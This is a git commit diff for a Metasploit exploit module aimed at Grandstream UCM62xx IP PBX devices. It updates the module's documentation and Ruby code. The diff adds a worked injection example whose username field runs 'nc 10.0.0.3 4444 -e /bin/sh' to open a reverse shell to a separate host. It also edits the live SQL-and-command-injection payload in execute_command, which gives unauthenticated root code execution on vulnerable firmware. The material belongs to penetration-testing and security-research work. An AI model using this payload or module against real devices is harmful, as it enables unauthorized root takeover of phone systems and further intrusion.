Addressed multiple review comments (spelling, doc details, randomization, etc)
This commit is contained in:
parent
4ebb702405
commit
2c989ec714
|
@ -2,21 +2,35 @@
|
|||
|
||||
### Description
|
||||
|
||||
This module exploits unauthenticated SQL and command injection vulnerabilities affecting
|
||||
the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
|
||||
unauthenticated and remote attacker to execute commands as root. This module affects
|
||||
UCM62xx versions before firmware version 1.0.19.20.
|
||||
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
|
||||
a command injection vulnerability (technically, no assigned CVE but was inadvertently
|
||||
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
|
||||
series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
|
||||
execute commands as `root`.
|
||||
|
||||
Exploitation happens in two stages:
|
||||
|
||||
1. An SQL injection during username lookup while executing the "Forgot Password" function.
|
||||
2. After successful SQL injection the user provided username is passed to a python script
|
||||
via the shell. Like so:
|
||||
|
||||
```
|
||||
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
|
||||
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
|
||||
```
|
||||
|
||||
This module affect UCM62xx versions before firmware version 1.0.19.20.
|
||||
|
||||
### Installation
|
||||
|
||||
The UCM62xx PBX is a physical device and is not known to be succesfully emulated.
|
||||
The UCM62xx PBX is a physical device and is not known to have been successfully emulated.
|
||||
However, if you have a device, affected firmware can be downloaded here:
|
||||
|
||||
* https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip
|
||||
|
||||
## Verification Steps
|
||||
|
||||
* Acquire an affected device and configure with affected firmware
|
||||
* Acquire an affected device and configure it with the affected firmware
|
||||
* Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
|
||||
* Do: `set RHOST <ip>`
|
||||
* Do: `check`
|
||||
|
@ -30,11 +44,11 @@ However, if you have a device, affected firmware can be downloaded here:
|
|||
|
||||
### 0
|
||||
|
||||
By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
|
||||
This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
|
||||
|
||||
### 1
|
||||
|
||||
By default, this target obtains a meterpreter session using `wget`.
|
||||
This target obtains a meterpreter session using `wget`.
|
||||
|
||||
## Options
|
||||
|
||||
|
@ -103,7 +117,7 @@ Revision : 63015
|
|||
Serial : 1126b9d4eacb275c
|
||||
```
|
||||
|
||||
### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
|
||||
### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat.
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
|
||||
|
|
|
@ -16,10 +16,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
info,
|
||||
'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
|
||||
'Description' => %q{
|
||||
This module exploits unauthenticated SQL and command injection vulnerabilities affecting
|
||||
the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
|
||||
unauthenticated and remote attacker to execute commands as root. This module affects
|
||||
UCM62xx versions before firmware version 1.0.19.20.
|
||||
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
|
||||
a command injection vulnerability (technically, no assigned CVE but was inadvertently
|
||||
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
|
||||
series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
|
||||
execute commands as root.
|
||||
|
||||
Exploitation happens in two stages:
|
||||
|
||||
1. An SQL injection during username lookup while executing the "Forgot Password" function.
|
||||
2. After successful SQL injection the user provided username is passed to a python script
|
||||
via the shell. Like so:
|
||||
|
||||
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
|
||||
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
|
||||
|
||||
This module affect UCM62xx versions before firmware version 1.0.19.20.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
|
@ -55,10 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_ARMLE],
|
||||
'Type' => :linux_dropper,
|
||||
'CmdStagerFlavor' => [ 'wget' ],
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
|
||||
}
|
||||
'CmdStagerFlavor' => [ 'wget' ]
|
||||
}
|
||||
]
|
||||
],
|
||||
|
@ -95,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
###
|
||||
def check
|
||||
normalized_uri = normalize_uri(target_uri.path, '/cgi')
|
||||
print_status("Requesting version information from #{normalized_uri}")
|
||||
vprint_status("Requesting version information from #{normalized_uri}")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalized_uri,
|
||||
|
@ -107,20 +116,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
body_json = res.get_json_document
|
||||
return CheckCode::Unknown('No JSON in response') unless body_json
|
||||
|
||||
resp_json = body_json['response']
|
||||
return CheckCode::Unknown('The JSON response is missing the response element') unless resp_json
|
||||
prog_version = body_json.dig('response', 'prog_version')
|
||||
return false if prog_version.nil?
|
||||
|
||||
prog_version = resp_json['prog_version']
|
||||
return CheckCode::Unknown('The JSON response is missing the prog_version element') unless prog_version
|
||||
|
||||
print_status("The reported version is: #{prog_version}")
|
||||
vprint_status("The reported version is: #{prog_version}")
|
||||
|
||||
version = Rex::Version.new(prog_version)
|
||||
if version < Rex::Version.new('1.0.19.20')
|
||||
return CheckCode::Appears('This determination is based on the version string.')
|
||||
return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
|
||||
end
|
||||
|
||||
return CheckCode::Safe('This determination is based on the version string.')
|
||||
return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
|
||||
end
|
||||
|
||||
##
|
||||
|
@ -136,13 +142,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# payloads are appropriate.
|
||||
###
|
||||
def execute_command(cmd, _opts = {})
|
||||
rand_num = Rex::Text.rand_text_numeric(1..5)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, '/cgi'),
|
||||
'vars_post' =>
|
||||
{
|
||||
'action' => 'sendPasswordEmail',
|
||||
'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
|
||||
'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"
|
||||
}
|
||||
}, 5)
|
||||
|
||||
|
|
Loading…
Reference in New Issue